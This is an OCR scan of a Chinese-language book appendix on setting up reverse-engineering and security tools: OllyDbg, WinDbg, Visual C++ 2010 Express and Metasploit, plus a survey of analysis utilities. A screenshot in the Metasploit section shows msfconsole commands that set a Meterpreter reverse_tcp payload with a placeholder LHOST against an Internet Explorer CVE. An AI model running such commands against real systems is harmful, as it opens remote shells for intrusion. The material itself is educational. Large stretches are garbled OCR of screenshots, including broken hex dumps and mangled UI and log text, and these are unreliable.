最 新 的 版 本 为 2.01， 但 这 是 一 个 Beta 版 ， 因 此 本 书 中 使 用 的 是 1.10 








€ > Q [wwwollydbgde 


3k OllyDbg 


VERSION 2.01 beta, updated 4x (19-Nov-2012) 
Enhanced plugin interface 


Off-topic 1: PaperBack - backups on the paper 
Off-topic 2: Jason - graphical interface to the Hercules S/370 
emulator 





AON) s 19 senate 
^) 3 No ADWARE 
TIEN // ¥ no vRusts 


SOFTPEDIA 


ofpediacom 


OllyDbg is a 32-bit assembler level analysing debugger for Microsoft® Windows®. Emphasis on binary code 
ioral aigu) analysis makes it particularly useful in cases where source is unavailable OllyDbg is a shareware, but you 
Run trace (zip) ^ can download and use it for free. Special highlights are: 

Load DLL Gin) 
* Intuitive user interface, no cryptical commands 
* Code analysis - traces registers, recognizes procedures, loops, API calls, switches, 
tables, constants and strings 
* Directly loads and debugs DLLs 








OllyDbg 没有 安装 程序 ， 只 要 将 下 载 的 ZIP 压缩 包 解压 缩 ， 将 其 中 
的 文件 复制 到 任意 目录 就 可 以 使 用 了 。 














A.3 安装 WinDbg 


WinDbg 分 为 32 位 和 64 位 两 个 版 本 。 


e WinDbg ( 32 位 版 ) 
https://msdn.microsoft.com/zh-cn/windows/hardware/gg463016 

e WinDbg ( 64 位 版 ) 
http://msdn.microsoft.com/zh-cn/windows/hardware/gg463012 


v 32 位 版 Debugging Tools for Windows 网 页 


SE Windows 32 位 版 本 的 调试 x 

















€ — C B https//msdn.microsoft.com/zh-cn/windows/hardware/gg463016 WE 
#8 Windows | 开发 人 员 中 心 - 硬件 v p 
仪表 板 入门” 设计 开发 认证 BS Windows 10 登录 


Windows 32 位 版 本 的 调试 工具 


更 新 日 期 : 5 月 28 日 2010 年 

本 页 内 容 

+ Window 调试 工具 的 当前 版 本 
+ 系统 要 求 


+ 何 时 使 用 32 位 调试 工具 
+ Window 调试 工具 的 以 前 版 本 


Window 调试 工具 的 当前 版 本 
当前 的 发 行 版 本 6.12.2.633 - 2010 ££ 2 A268 


Windows 32 版 本 的 调试 工具 现在 可 以 通过 可 下 载 组 件 获得 ， 该 组 件 作为 Windows Software Development Kit (Windows 
SDK) 的 一 部 分 提供 。 


下 载 Windows SDK 调试 工具 


老 版 本 可 以 在 网 页 的 最 下 方 找到 下 载 链接 。 
最 新 版 可 以 通过 Windows Software Development Kit ( Windows 
SDK ) 的 安装 程序 选择 所 需 的 工具 来 进行 安装 。 
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V Windows SDK 网 页 
( http://www.microsoft.com/en-us/download/details.aspx?id=8279 ) 


EE Download Microsoft Windo, x 


e- -> C D www.microsoft.com/en-us/download/details.aspx?id 





Software Categories Security Support Shop 


MW Microsoft Windows SDK for Windows 7 and .NET 
国 Framework 4 


uu em Free PC update 


* Security patches 
+ Software update 
* Service packs 

* Hardware driver 


The Windows SDK provides tools, compilers, headers, libraries, 
code samples, and a new help system that developers can use to 
create applications that run on Microsoft Windows. © Run microsoft upd: 


© Details 


中 System Requirements Sign up for Team Fou s 


| > 


‘$ Windows® SDK for Windows® 7 and .NET Framework 4 


Ws Windows® SDK Setup Wizard FE] Software : 
Development Kit 


Welcome to the Setup Wizard. 


You can now install the Microsoft® Windows® 
Software Development Kit for Windows 7 and .NET 
Framework 4 


This SDK provides headers, libraries, tools, samples, 
YC++ 2010 compiler/CRT, and other resources to m 


help you develop Windows applications using both 人 d Soit 


native and managed technologies. This SDK supports A are 
developing on and for Windows 7, Windows Server 


nd . 
2008 R2, Windows Vista, Windows XP and Windows D | t K t 
Server 2008, and targeting .NET Framework version eve Opt I en | 


4 and down level versions to 2.0. 
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V License Agreement 


$ Windows® SDK for Windows® 7 and .NET Framework 4 


gs End-User License Agreement AJ Software : 
Development Kit 


^ 


MICROSOFT SOFTWARE LICENSE TERMS 


MICROSOFT WINDOWS SOFTWARE DEVELOPMENT KIT FOR WINDOWS 
7 and .NET FRAMEWORK 4 


These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) 
and you. Please read them. They apply to the software named above, which includes the media on which you received 
it, if any. The terms also apply to any Microsoft 


e updates, 
e supplements, 


Please read the End-User License Agreement carefully and select either "I Agree" or "I Disagree.” 


Ol Disagree 








Print < Back Next > Cancel 








E 





选择 IAgree， 进 入 下 一 页 。 


V 选择 安装 目录 


$ Windows® SDK for Windows® 7 and -NET Framework 4 


8 Install Locations i Software n 
~ Development Kit 


Windows SDK Setup will install content to the following locations: 
To install to these folders, click Next. To install to a different folder, click Browse and select another folder. 


Destination Folder for Tools 
(GXProgram Files¥Microsoft SDKs¥Windows¥v7.1 








Destination Folder for Samples 
[c: XProgram Files¥Microsoft SDKs¥Windows¥v?.1¥Samples 























< Back C Next> ] Cancel 





选择 要 


安装 的 工具 
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$ Windows® SDK for Windows® 7 and .NET Framework 4 


ey Installation Options 













































































v 















































在 这 里 我 们 可 以 选择 安装 
要 安装 WinDbg， 请 选择 


e Windows Native Code Development 


Samples 

Windows Headers and Libraries 
Tools 

Visual C++ Compilers 


.NET Development 


Intellisense and Reference Assemblies 
Tools 


Common Utilities 


Microsoft Help System 
Application Yerifier 

Windows Performance Toolkit 
Debugging Tools for Windows 


Redistributable Packages 


Microsoft Visual C++ 2010 
Application Verifier 
Debugging Tools 

Windows Performance Toolkit 





Windows. 


V 安装 设置 完成 


$ Windows® SDK for Windows® 7 and -NET Framework 4 


P Begin Installation 


Olick Next to begin your installation of the Windows SDK, or click 
Back to make changes. 


Q 


Windows" 


~. Software 
zc Kit 


Feature Description Detail 
Windows Native Code Development 


Installs components that let you develop native code applications. 
Included are the Windows Headers and Libraries, Visual C++ 


Compilers, Tools, and Samples for x8 


16, x64, and Itanium 


architechures on Windows 7, Windows Vista, Windows XP, Windows 
Server 2008 R2, Windows Server 2008, and Windows 2003 R2. 


This feature and its children require 910.0 MB of hard disk space. 


Disk Space Requirements. 





[ volume Available 





o: 338GB 


Download Size Estimated Time 





79.8 MB 55 


Mnutes 





[<Back 


][_ Next> | ment 
































HEY Debugging Tools for 


Windows" 


~. Software 
AT Software on Kit 


m a Windows* 


& . Softwa 
‘Development Kit 


re 











< Back 


JL 7] [I gone 
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Y 安装 开始 


"© Windows® SDK for Windows® 7 and NET Framework 4 


Windows" 


8 Installation Progress 3. Software " 
Development Kit 


Status 
Setup is now installing Windows SDK components. 


Action 
Downloading 











安装 结束 


$ Windows® SDK for Windows® 7 and -NET Framework 4 


P Installation Complete B stus 
~ Development Kit 


The selected modifications are complete. 
To view the log, click View Log. 
To exit, click Finish. 


For information about other free Microsoft developer downloads 
see the Windows SDK Release Notes. 


m Windows* 


& . Software 
Ver te Wee SDK Fe Mt ~ Development Kit 


Help improve our products by sending your installation report 
to Microsoft. No information collected is used to identify you 
or contact you. 




















Glick to view the Privacy Statement. 





到 这 里 我 们 就 安装 完成 了 。 
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A.4 "XX Visual Studio 2010 








尽管 现在 微软 已 经 发 布 了 Visual Studio 2012， 但 本 书 中 还 是 使 用 
Visual Studio 2010 Express 版 来 进行 讲解 (准确 来 说 应 该 是 Visual C++ 
2010 Express 版 )。 大 家 可 以 从 下 面 的 网 站 下 载 “。 























V Visual Studio 2010 下 载 页 面 
( http://www.microsoft.com/visualstudio/eng/downloads#d-2010-express "y 


E Download | Microsoft visu. x VN 





Q | D www.microsoft.com/visualetudio/eng/downloadsiid-201 0-express 


[< Visual Studio 


control when building either native Windows Pack (CLIP) uses tooltip captions to display 
(COM+) applications or ,NET Framework- translations for common user interface 
managed Windows applications. After elements in the Visual Studio integrated 
installation, you can try this product for up to 30 development environment (IDE), Use CLIP as a 
days. You must register to obtain a free product language aid, to see translations in your own 
key for ongoing use after 30 days, dialect, update results in your own native 
tongue or as a learning tool, 
Download language 
ELTE Arabic - 
Greek - EMnviká 
Installation options Hebrew - nay 
Visual C++ 2010 Express -日 本 语 SIC ed 


KO Install now Hungarian - Magyar 
Malay - 
Malayalam - DOOOOO 
Oriya - D0000 
Tamil - gG 
Thai - seg 


go.microsoft.com/?linkid-9709955 Choose Language 





























如 果 要 使 用 Visual Studio 2012 Express 版 ， 可 以 从 以 下 网 站 下 载 for 
Windows Desktop 的 版 本 ( 可 用 于 Windows 7 及 更 高 版 本 系统 )。 





(D 目前 微软 官方 已 不 提供 Visual Studio 2010 的 下 载 ， 各 位 读者 只 能 从 第 三 方 渠道 获 
取 ， 或 者 使 用 最 新 的 Visual Studio 2013/2015 Community 版 本 。 译 者 注 
© 本 网 址 已 被 重 定 向 到 Visual Studio 的 门户 页 面 。 译 者 注 
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e Visual Studio Express 2012 products 


http://www.microsoft.com/visualstudio/eng/products/visual-studio- 


Qo 
express-pr oducts 


V Setup 
Asl xd 


Welcome to Setup o0 Visu 
isual C++-2010 
Express 


Welcome to the Microsoft Visual C++ 2010 Express installation wizard. Microsoft Visual C++ 2010 
Express includes the 32-bit Visual C++ compiler toolset and an optional lightweight development 
environment. This wizard will guide you through the process to install this program and any 
prerequisites needed on this computer. 


Help Improve Setup 

You can submit information about your setup experiences to Microsoft. To 
participate, check the box below, 

ÍV. Yes, send information about my setup experiences to Microsoft Corporation, 


Li) For more information, click Privacy Statement 














V License 
sisi; 
License Terms OO Visu 
isual C++ 2010 


Express 


Be sure to carefully read and understand all the rights and restrictions described in the license 
terms, You must accept the license terms before you can install the software. 





MICROSOFT SOFTWARE LICENSE TERMS a 
MICROSOFT VISUAL C++ 2010 EXPRESS 


These license terms are an agreement between Microsoft Corporation (or based on where 
you live, one of its affiliates) and you. Please read them, They apply to the software named 
above, which includes the media on which you received it, if any. 





[The tarme alen anni ta anu Micracaft 





- 


Press the Page Down key to see more text, 


© 1 have read and accept the license terms 
© 1 do not accept the license terms 











D 本 网 址 已 被 重 定向 到 Visual Studio 的 门户 页 面 。 一 一 译 者 注 


A.4 安装 Visual Studio 2010 


选择 Ihave read and accept the license terms ， 然 后 进入 下 一 页 。 


rS 
V 安装 选项 
ABl xd 


Installation Options on Visu al C++ 2010 
Express 





Select the optional product(s) you would like to install; 


[^ Microsoft Silverlight 


Microsoft Silverlight is a small browser plug-in that enables rich Web experiences. By 
installing Silverlight you accept the Silverlight license agreement. 





SQL Server Express integrates with Visual Studio to provide basic client-database and 
server-database capabilities. 


U) For more information, see the Readme file. 

















本 书 中 不 使 用 Silverlight 和 SQL Server, 


moot 
V 选择 安装 目录 
后 下 局 


TH Microsoft 
Destination Folder on Visu al C++ 2010 
Express 


Select the location where you would like to install Microsoft Visual C++ 2010 Express. 


Install in folder: 


[enProaram Files\Microsoft Visual Studio 10.01 Browse. 





The following products will be installed; 





+ Microsoft Application Error Reporting ^ 
» VC 9.0 Runtime (x86) 

* Microsoft ,NET Framework 4 

+ Microsoft Windows Installer 4.5 (x86) - Windows XP 

+ Microsoft Windows Installer 4.5 Update (x86) - Windows XP 

+ „NET Framework 4 Multi-Targeting Pack + 








Disk space requirements: C: 2.2 GB 








| 237 


此 请 不 要 选中 这 两 项 。 
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oft Visual C++ 2010 Express Setup =/51 x) 


Installation Progress on Visu al C++ 2010 
Express 


The following item(s) are being installed on this computer: 





w' Microsoft Application Error Reporting 

w' VC 9.0 Runtime (x86) 

Ep Microsoft.NET Framework 4 

" Microsoft Windows Installer 4.5 (x86) - Windows XP 


" Microsoft Windows Installer 4.5 Update (x86) - Windows XP 








Currently Installing (3 of 9): Microsoft ,NET Framework 4 








V 重启 系统 





[ Microsoft Yisual C++ 2010 Express Setup [sl es 
Installation Progress EO Wisi 
Isual C++-2010 
Express 


The following item(s) are being installed on this computer: 


% 


v Microsoft Visual C++ 2010 Express Setup 
v 


> ‘You must restart your computer to complete the installation. Setup will 
automatically continue after your computer has restarted. 













Restart Later, | 
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V 安装 结束 


Fẹ Microsoft Visual C++ 2010 Express Setup 


=la x! 


Meat 
OQ) Visual C++2010 
Express 


Microsoft Visual C++ 2010 Express has been installed successfully. 


Setup complete 


@ Visit Microsoft Update to download the latest service packs and security updates. 








到 这 里 就 安装 完成 了 。 
不 过 ， 如 果 不 进行 在 线 注册 ， 软 件 只 能 使 用 30 天 。 请 大 家 从 菜单 


中 选择 Help 一 Register Product， 从 弹出 的 网 页 获取 注册 密 钥 。 


Pa [=] 
Vv 注册 产品 


314 xl 
OO Visual C++2010 Express 


Microsoft ¥isual C++ 2010 Express will run for 29 more days. 


Registration is required to continue using Microsoft Visual C++ 2010 Express. Registration is 
free and provides you with access to additional benefits. 


Obtain a registration key online | 
Registration Key: 


Register Now | 





创建 一 个 Microsoft 账户 ， 并 在 登录 状态 下 点 击 Obtain a registration 


key online， 画 面 上 会 显示 出 注册 密 钥 。 将 密 钥 输入 上 面 的 对 话 框 ， 就 可 
以 完成 注册 了 。 


A.5 安装 Metasploit 





这 里 我 们 来 介绍 一 下 Windows 版 Metasploit 的 安装 方法 。 
基本 上 只 要 按照 安装 程序 的 提示 操作 即 可 ， 其 中 需要 用 户 选择 的 部 
分 如 下 。 








。 安装 目录 
。 服务 监听 端口 


。 域名 ( 本 书 中 不 使 用 ) 
安装 和 启动 都 比较 耗 时 ， 请 大 家 耐心 等 待 。 


Y Metasploit 网 页 
( https://www.rapid7.com/products/metasploit/ ) 


FREE METASPLOIT DOWNLOAD 











< 
|) SIAR TENSE e v5 





请 根据 所 使 用 的 环境 进行 下 载 。 
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V Setup 


Setup - Metasploit 


Welcome to the Metasploit Setup Wizard. 








V License Agreement 


License Agreement 





Please read the following License Agreement. You must accept the terms of this agreement 
before continuing with the installation. 





Rapid? End User License and Services Terms and Conditions 


Customer agrees to be bound by the following terms and conditions 
(this "Agreement") in connection with its purchase and use of 

certain Rapid? LLC’s ("Rapid?") Software and Services (each as 
defined below). Before installing and using any Software and/or 
obtaining and using any Services you should read this Agreement 
carefully. Clicking "accept" or otherwise installing and/or using 
ithe Software and/or obtaining and/or using any Services | 


© 


Q Ido not accept the agreement 





Do you accept this license? 


BitRock Installer 








选择 Iaccept the agreement， 然 后 点 击 Next. 





Installation folder 


Please, choose a folder to install Metasploit 





Select a folder 





























如 果 没 有 特别 的 理由 ， 使 用 默认 安装 目录 即 可 。 





V 设置 监听 端口 


Metasploit Service 





Please enter the port that the Metasploit service will use. 





SSL Port (ZEN 
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设置 域名 ( 和 有 效 期 ) 


uL ES 
Generate an SSL Certificate M 





Please provide the fully qualified domain name of this system below (e.g. 
metasploit example.com). A certificate is generated for a specific server name and web 
browsers will alert users if the name does not match. 





Server Name 














Days of validity 








BitRock Installer 








从 浏览 器 访问 Metasploit 时 需要 使 用 域名 和 端口 ， 如 果 没 有 特别 的 
理由 ， 保 留 默 认 值 即 可 。 


安装 设置 完成 


Ready to Install 





Setup is now ready to begin installing Metasploit on your computer. 





| Cancel 
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V 安装 开始 


M metasploit 


* Conduct penetration tests through an easy-to-use interface 
* Demonstrate true risk to management and IT operations 
* Eliminate false positives from third-party vulnerability scanners 


* Upgrade to Metasploit Pro for advanced enterprise features 


Installing 
Waiting for Metasploit to start. This may take a few minutes. 














V 安装 结束 


Completing the Metasploit Setup Wizard 


Setup has finished installing Metasploit on your computer. 





v] Access Metasploit Web UI? 


























本 书 中 没有 使 用 Web UI， 因 此 请 大 家 取消 这 里 的 复 选 框 。 
关于 服务 的 启动 和 停止 ， 稍 后 还 可 以 自由 配置 。 



















Aj Windows Update 
$9. Windows Jn 
@ POPSLOPILACHEORE 
£y Por 
e -A 
(n 23-5797 

@ Internet Explorer 

Ww MSN 

(Ql Outlook Express 

(D. Windows Media Player 
AB Windows Messenger 

QR Windows L-E- 3—5- 
D UE-b PYABYA 


© Windows Media Player 

b. Windows Messenger 

-BA 

o Windows XP YP— 

é Internet Explorer 加 Google Chrome 
(f) Red Gate 


SATOFOISA®) PP fà Metasploit 








Metasploit Pro Conso.. 


File Edit View Help 














Arv Omo 


A.5 


(n) Framework 
(f) Services » 
£f Tools » 
Access Metasploit Web UI 


















Diagnostic Logs 






Diagnostic Shell 





Framework Update 





Metasploit Console 

Password Reset 

Uninstall Metasploit 

> Web - Community 

» Web - Metasploit 
Web - Rapid? 








Fe (Ie HA AY: Metasploit Console. 


使 用 方法 可 参见 Metasploit 网 站 。 


安装 Metasploit 
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V 搜索 CVE 1 


[) Exploit Database (DB) | M. x Wy 





€ > Q D wwwmetasplitcom/mod 


(J) metasploit Exploits Blog Support 


Metasploit Auxiliary Module & Exploit Database (DB) 


Welcome to the Exploit Database (DB) for Metasploit Auxiliary and Exploit Modules. The Metasploit Project hosts the 
world's largest database of quality assured exploits, including hundreds of remote exploits, auxiliary modules, and 
payloads 


Search for exploits and auxiliary modules 


Open Source Vulnerability DataBase ID Bugtraq ID 


Full Text Search Common Vulnerabilities Exposures (CVE) 
ID 


CVE-2013-1347 


Microsoft Security Bulletin ID 





v 搜索 CVE 2 


[ Microsoft Internet Explorer x WS 


CD www. metasploit.com/ rni 


$ msfconsole 


- show payloads 


> set PAYLOAD windows/meterpreter/reverse tcp 
> set LHOST [MY IP ADDRESS] 
> exploit 








Metasploit 是 一 个 博大 精深 的 工具 ， 关 于 它 的 内 容 可 以 写成 一 本 书 ， 


A5 Metasploit | 247 


如 果 有 兴趣 深入 学 习 的 话 ， 推 荐 大 家 读 一 读 这 本 书 。 








e Metasploit The Penetration Tester’ s Guide" 
http://shop.oreilly.com/product/9781593272883.do 





DOD 本 书 中 文 版 名 为 《Metasploit 渗透 测试 指南 》 电子 工业 出 版 社 ，2012 年 出 
版 。 译 者 注 





A6 分析 工具 





下 面 我 们 来 汇总 一 下 本 书 中 出 现 的 各 种 分 析 工 具 。 





Stirling / BZ Editor 
Stirling 是 一 个 功能 强大 的 二 进 制 编辑 咒 ， 本 书 中 就 使 用 了 这 个 
工具 。 
它 唯一 的 缺点 是 无 法 流畅 地 处 理 以 GB 为 单位 的 大 文件 ， 要 处 理 这 
样 的 文件 ， 可 以 选择 BZ Editor. 









































v Stirling 
( http://www.vector.co.jp/soft/win95/util/se079072.html ) 


a5 Stirling - [Stirline.exe] 
其 22444 REO RRBHO EEO) 04/8500 AVI") 
nist] | sle | allen]: 
00 01 02 03 04 05 06 07 08 09 OA Ol 

Bp 54 90 00 03 00 00 00 04 00 00 0 

B8 00 00 00 00 00 00 00 40 00 00 0 

00 00 00 00 00 00 00 00 00 00 00 0 

00 00 00 00 00 00 00 00 00 00 00 0 

OE 1F BA OE 00 B4 09 CD 21 B8 01 4 

69 73 20 70 72 6F 67 72 61 6D 20 6 

74 20 62 65 20 72 75 6E 20 69 6E 2 

6D 6F 64 65 2E OD OD 0A 24 00 00 0 

9 

9 

9 

9 





al COO lel etel 
23456 789ABCDEF 





D 01 
F MZ 
0 
0 
0 


.ALLAITh 
is program canno 
t be run in DOS 


33 9D 41 C4 7? FC 2F 97 7? FC 2F 
77 FC 2F 97 61 FC 2F 97 F4 E0 21 
9F E3 25 97 09 FC 2F 97 77 FC 2E 
15 E3 3C 97 66 FC 2F 97 SF E3 24 
CF FA 29 97 76 FC 2F 97 52 69 63 6 
Wo 00 00 00 00 00 00 00 00 50 45 00 00 4 
0 Wa OD EF 70 37 00 00 00 00 00 00 00 00 EO 00 OF 01 
iM 0B 01 06 00 00 BO 09 00 00 50 03 00 00 00 00 00 
40 91 06 00 00 10 00 00 00 CO 09 00 00 00 40 00 
|0x00000000 — | PAR LE (635584 Bytes 





B 
0 
0 
0 
0 
C 
3 
0 
0 
7 
7 
7 
8 


00 o0 -1042o0oooomollr 


J. /Bichw./. 
Pes sh 


C 0 
FF 
0 0 
0 0 
8 0 
D2 
16 
44 
0 0 
7 Fi 
7 Fi 
5F 
EF 
TF 
C0 


E 
0 
C 
C 
D 
C 
C 
1 
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V BZ Editor 
( http://www.vector.co.jp/soft/win95/util/se032859.html ) 


File Edit Vier Jump Tools Help 
m b |X| 











+7 +8 9123156789 0BCDEF 
98-05 [2..... 

66-46 

66-66 

66-66 

€D-21 .L.*Th 
72-61 is program canno 
6E-28 t be run in DOS 
88-25 node 

86-69 

8C-AA 

8C-4E 

8C-4E 

8C-4E 

86-52 

90-08 

88-05 

61-68 

88-C6 

96-08 

88-05 

66-6C 

90-08 





546, 816 bytes 





Process Monitor 


这 是 一 个 对 指定 进程 的 文件 、 注 册 表 访问 进行 监控 的 工具 ， 可 以 从 
Windows Sysinternals 进行 下 载 。 


V Process Monitor 


( https://technet.microsoft.com/en-us/sysinternals/bb896645 ) 


Š Process Monitor — Sysinternals: www.sysinternals.com 回回 加] 
Eile Edit Event Filler Tools Options Help 


QgBE!vAGO!g!dM:!([a[a am 
Process Name. PID Operation Path Result Detail ^| 


口 sassexe 684 gÈ RecOpenKey — HKLMXSECURIT Y&Policy SUCCESS Desired Acc — 
Ejisass.exe 684 gÈ RecOpenKey — HKLM¥SECURITY#Policy¥SecDesc SUCCESS Desired Acc 
Ejisass.exe 684 gf RerGueryVelue HKLM¥SECURITY¥Policy¥SecDesc¥(Def.. BUFFER OVERFLOWLeneth: 12 
FEjisass.exe 584 gÈ RegCloseKey —— HKLM¥SECURITY#Policy¥SecDesc SUCCESS 
Essssese 684 gÈ RecOpenKey — HKLM¥SECURITY¥Policy¥SecDeso SUCCESS Desired Acc 
Ejisass.exe 684 gl RecGueryVslue HKLM¥SECURITY#Policy¥SecDeso¥Def.. SUCCESS Type: REGS 
~ Elisass.exe 684 gÈ ReeCloseKey ^ HKLM¥SECURITY¥Policy¥SecDesc SUCCESS 
Fjisass.exe 584 gl Resclosekey 。 HKLM¥SECURITY#Policy SUCCESS 
Ejisass.ene 684 @XReeOpenkey — HKLM¥SECURITY#Policy SUCCESS Desired Acc 
 Fisass.exe 684 fÈ RecOpenKkey —— HKLM¥SECURITY#Policy¥SecDesc SUCCESS Desired Acc 
lsasseyxe egQueryValue "&PolioyS ecDe sci(De f. ength: 
E 584 gÈ RecQueryVelue HKLM¥SECURITY¥Policy¥SecDesc¥(Def.. BUFFER O VERFLO WLength: 12 
lsass.exe eeCloseKey olicy¥SecDese 
Ai 684 Ø Resclosek， HKLM¥SEQURITY¥Policy¥Se cD« SUCCESS 
ssss.exe. egDpenKey olioy¥SecDeso esired Acc 
m 684 gii ReeOpenk HKLM¥SECURITY#Policy¥Se D: SUCCESS Desired Aci 
Ejisass.exe 684 gÈ RecQueryVelue HKLM¥SECURITY¥Policy¥SecDesc¥(Def.. SUCCESS Type: REGS: 
Isass.eme legCloseKey olicy fS ecDesc. 
imi 584 ifi RecClosek HKLM¥SECURITY#Policy¥Se cD: SUCCESS 
lsassexe 4 erOloseKey ^ HKLM¥SEQURITY¥Policy 
68: ReeCk IKLM¥SECURITY¥Poli SUCCESS 
ssss.exe. egOpenKey olioy esired Acc 
E 584 gii ReeOpenk HKLMXSECURIT Y&Poli SUCCESS Desired Ac: 
~ 口 sassexe esOpenKey “¥Policy¥SecDesc esired Acc 
im 684 gÈ ReeOpenk, HKLM¥SECURITY¥Policy¥Se cD: SUCCESS Desired Ac 
Isess.eme egQueryvalue olioy¥SecDesc¥(Def. eng 
im 684 gÈ ReeQueryVelue HKLM¥SECURITY#Policy¥SecDeso¥(ef.. BUFFER OVERFLOWLeneth: 12 
a »plorer. egOpenKey ficrosoftié Windows. esired Acc 
E] Explorer. EXE 1308 gif ReeOpenk HKLMXSOFTWAREXMI ft¥Windows¥.. NAME NOT FOUND Desired Acc) 


Jii | > 


Showing 19.514 of 49,986 events (39%) Backed by virtual memory 
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Process Explorer 
这 是 一 个 


这 是 ] 来 确认 当前 运行 中 的 进程 之 间 的 父子 关系 以 及 各 进程 详 
细 信 息 的 工具 ， 可 以 理解 为 是 一 个 高 级 版 的 任务 管理 咒 。 














V Process Explorer 
( https://technet.microsoft.com/en-us/sysinternals/bb896653.aspx ) 


sinternals.com [C AMPERS-8129COUEX Administrator] 


(- ej 


Process Explorer - Sysinternals: www. 


Options iew Process Find 


Process 


i terrupts 
ges 
pese: 
E f rintoron ene 
日 回 :emvicesexe 
日 回 =chostexe 
回 "mprseeme 
parehestexe 
辐 :ehostexe 
svchost.exe 
[hosten 
[ni sPooisvexe 
日 "v pr.ctlexe. 
g epesteeses 
posteres.exe 
Eposteres.ene 
Epposteres.exe 
[posteres 
Fpposteres.exe 


CPU Usage: 0.00% Commit Charge: 3257% Processes: 43 | Physical Usage: 58.90% 


Sysinternals 工具 


Windows Sysinternals 中 还 提供 了 一 些 本 书 








12380K 
1376 K 
1,764K 
3,308 K 
1,996 K 
4404 K. 
3348 K 
3.768 K 
3744K 
4864K 


260K 
OK 
412K 
4932 K 
12,540K 
2.452 K 
5172K 
4920K 
4284K 
18776 K 
3640K 
4450K 
5364K 
4004K 
10312 K 
5,056 K 
5.728 K 
5.344 K 
6760K 











n/a Hardware Interrupts and DPOs 
556 Windows NT Session Manager 
604 Client Server Runtime Process 
628 Windows NT Logon Application 
672 Services and Controller app 
844 Generic Host Process for Win... 
2812 WMI 
940 Generic Host Process for Win... 
1032 Generic Host Process for Win... 
1124 Generic Host Process for Win... 
1176 Generic Host Process for Win... 
1364 Spooler SubSystem App. 
1592 pg.otl ~ sterts/stops/restarts... 
1708 PostgreSQL Server 
1756 PostgreSQL Server 
1792 PostereSQL Server 
1800 PostgreSQL Server 
1808 PostgreSQL Server 











Company Name 


Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
Microsoft Corporation 
PostgreSQL Global Deve 
PostgreSQL Global Deve 
PostgreSQL Global Deve 
PostgreSQL Global Deve 
PostgreSQL Global Deve 
PostgreSQL Global Deve WI 
> 





家 可 以 从 Utilities Index 页 面 上 找到 所 有 工具 的 列表 。 


e Windows Sysinternals (Utilities Index) 


https://technet.microsoft.com/en-us/sysinternals/bb545027 





P 没 有 介绍 到 的 工具 ， 


这 里 面 有 很 多 有 意思 的 工具 ， 主 要 包括 文件 访问 、 进 程 监控 、 


络 、 安 全 等 方面 。 


大 


网 
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免 耳 旋风 


免 耳 旋风 是 一 个 用 于 查看 和 修改 进程 内 存 空 间 的 工具 ， 它 和 一 般 的 
调试 名 在 方向 性 上 有 些 差异 。 








v RAM (7 SAAMNY Ty ) 
( http://www.vector.co.jp/soft/win95/prog/se375830.html ) 

































































PID: 00000 LJ 
EERO BHW E RRO IAID RTV OFOW TOWA AWIW -ax 
élze-2|c-|m[ime II DR CARRIE. AlteD 3 
A s EBITD. 
ess EEO WI 一 
N A Q N PEB/TEBRT: (E). 
uoh: i 5^ 90 00 ya pene. 
00 p00 : 0 an SEISKA (UO. 
00400030 : 0 |_ Ther. 
00400040 : OE 292 SREBET D. AIR 7. L.A, (UR 
00400050 : 70 a iS program canno 
n E :2 BE 3 PLING). Alt+L S 
an ae : E EI VEEP IND. Alte Hes i DOS 
00400030 : Ag) PRÉCJOEAORSTE Veit TD NO aD as a 
00400090 : 4 Fal MOSMA SUA. ap 
U P 3 FU p. t+ 
00400040 : | FA) REP ev ERAT HUMERIS (). 
00400080 : 3 F4| Dumu-Fer»n- FQ. i 
004000C0 : 3 F4| SHRPEUACOreateRemoteThreadBBI Si (C) 
Hu TED i C H AV» E/NY RINERROSYII7 1 VEPER D.. 
0 : B3 BB| PbtXsTÉS COXt REA 777 VEFBO- | 
004000F0 : 00/4C 01 04 00108 A5 46 40/00 00 00 00 
DD S 00|E0 00 OF 01/0B 01 06 00/00 BO 00 00 
0 110 : 00/00 00 00 00|6A B1 00 00/00 10 00 00 
00400120 : 00 CO 00 00/00 00 40 00/00 10 00 00/00 10 00 00 
nna4nnian - nda AN an nninn AN AN nanin4 AA AN ANIAN an AA nn v 




















ER- Windows ANSI A 


这 个 工具 有 一 些 一 般 调 试 器 所 不 具备 的 功能 ， 例 如 对 进程 挂 载 任 意 
代码 和 DLL、 查 看 某 个 特定 地 址 中 值 的 变更 履历 等 。 
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后 记 


二进制 ”这 个 词 的 涵义 十 分 宽泛 。 可 执行 文件 、 图 像 、 声 音 、 视 
频 …… 只 要 是 在 计算 机 上 处 理 的 数据 ， 都 是 “二 进 制 ” 数 据 。“ 二 进 制 ” 
原本 只 是 一 个 数学 用 语 ， 不 过 现在 人 们 更 多 地 将 它 看 成 是 一 个 和 “文本 
数据 ”相对 的 概念 。 

Hsc, 文本 数据 也 是 一 种 用 二 进 制 来 表现 的 数据 ， 我 们 也 可 以 将 它 
归 为 二 进 制 的 范畴 。 比 如 说 ， 字 母 A 其 实 就 是 0x41 嘛 。 按 照 这 样 的 思 
路 ， 学 习 计算 机 实际 上 也 就 是 在 学 习 二 进 制 数据 。 

现在 的 计算 机 可 以 访问 互联 网 ， 还 可 以 编写 文档 和 收发 邮件 。 不 仅 
如 此 ， 它 还 能 用 来 作曲 、 画 画 、 开 发 软件 。 我 们 还 可 以 用 计算 机 将 拍摄 
的 照片 和 视频 上 传 到 网 上 。 存 人 类 的 历史 上 ， 似 乎 没有 哪 一 样 工具 像 计 
算 机 这 样 万 能 ， 然 而 实现 这 一 切 的 也 无 非 是 0 和 1 的 组 合 而 已 。 

如 今 ， 大 数据 、 机 带 学 习 、 人 工 智能 等 字眼 正 热 ， 通 过 这 些 技术 可 
以 推测 用 户 的 偏好 ， 将 相似 的 东西 匹配 起 来 ， 或 者 检测 服务 器 的 异常 ， 
其 应 用 范围 十 分 广泛 。 在 计算 机 安全 领域 ,基于 攻击 模式 的 启发 式 分 析 
技术 也 正在 研究 之 中 。 在 这 些 研究 的 影响 下 ， 对 于 20 En HU ACE DUE 
如 魔法 一 般 的 世界 ， 现 在 正 一 步 一 步 地 变 为 现实 。 

信息 工程 最 有 趣 的 地 方 ， 就 是 通过 0 和 1 这 样 简单 的 组 合 能 够 组 成 
机 咒语 言 、 定 义 文 件 格式 、 构 建 软件 ， 从 而 解决 各 种 各 样 的 问题 。 计 算 
